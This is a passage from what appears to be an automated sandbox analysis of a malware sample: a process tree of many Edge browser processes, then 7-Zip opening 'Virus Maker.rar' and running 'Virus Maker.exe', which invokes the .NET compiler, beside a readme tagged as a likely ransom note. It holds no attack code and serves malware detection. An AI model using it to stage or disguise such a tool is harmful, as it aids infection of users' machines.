  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8924 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:6504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8828 /prefetch:1
  2⤵
  PID:6888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10880 /prefetch:1
  2⤵
  PID:5732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1908 /prefetch:1
  2⤵
  PID:1028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8776 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2560 /prefetch:1
  2⤵
  PID:392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10088 /prefetch:1
  2⤵
  PID:496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9588 /prefetch:1
  2⤵
  PID:5404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2336 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12792 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12924 /prefetch:1
  2⤵
  PID:6252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11168 /prefetch:1
  2⤵
  PID:5496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12680 /prefetch:1
  2⤵
  PID:6200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9420 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12640 /prefetch:1
  2⤵
  PID:708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12592 /prefetch:1
  2⤵
  PID:1780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12620 /prefetch:1
  2⤵
  PID:6640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10208 /prefetch:1
  2⤵
  PID:1636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:6180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12344 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9776 /prefetch:1
  2⤵
  PID:2240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12616 /prefetch:8
  2⤵
  - NTFS ADS
  PID:984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9768 /prefetch:1
  2⤵
  PID:7376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9132 /prefetch:1
  2⤵
  PID:7744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9108 /prefetch:1
  2⤵
  PID:7752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:8004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11624 /prefetch:1
  2⤵
  PID:7264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8644 /prefetch:1
  2⤵
  PID:7308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
  2⤵
  PID:7896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12272 /prefetch:1
  2⤵
  PID:708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8628 /prefetch:1
  2⤵
  PID:6776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12080 /prefetch:1
  2⤵
  PID:7672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12808 /prefetch:1
  2⤵
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9692 /prefetch:1
  2⤵
  PID:7516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9972 /prefetch:1
  2⤵
  PID:7540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8920 /prefetch:1
  2⤵
  PID:6236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11724 /prefetch:1
  2⤵
  PID:7948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9100 /prefetch:1
  2⤵
  PID:7848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8856 /prefetch:1
  2⤵
  PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:1
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10396 /prefetch:1
  2⤵
  PID:7404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10884 /prefetch:8
  2⤵
  - NTFS ADS
  PID:7412
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Virus Maker.rar"
  2⤵
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: GetForegroundWindowSpam
  PID:5944
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO837302B1\readme.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:7744
- - C:\Users\Admin\AppData\Local\Temp\7zO83706981\Virus Maker.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO83706981\Virus Maker.exe"
    3⤵
    - Executes dropped EXE
    PID:1028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cpghh5uc\cpghh5uc.cmdline"
      4⤵
      PID:6308
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73EA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAB755259EED14BE6B3DE8519C7DEE5E.TMP"
        5⤵
        
        PID:2524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13084 /prefetch:1
  2⤵
  PID:2020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12816 /prefetch:1
  2⤵
  PID:4076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12008 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10928 /prefetch:1
  2⤵
  PID:7228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
  2⤵
  PID:7360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10076 /prefetch:1
  2⤵
  PID:7332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12472 /prefetch:1
  2⤵
  PID:6288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12440 /prefetch:1
  2⤵
  PID:7300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
  2⤵
  PID:6240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8784 /prefetch:1
  2⤵
  PID:6256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8928 /prefetch:1
  2⤵
  PID:5836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9776 /prefetch:1
  2⤵
  PID:6332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9420 /prefetch:1
  2⤵
  PID:7340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9652 /prefetch:1
  2⤵
  PID:5080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9336 /prefetch:1
  2⤵
  PID:7600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12656 /prefetch:8
  2⤵
  PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7864 /prefetch:1
  2⤵
  PID:5856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8772 /prefetch:1
  2⤵
  PID:7192
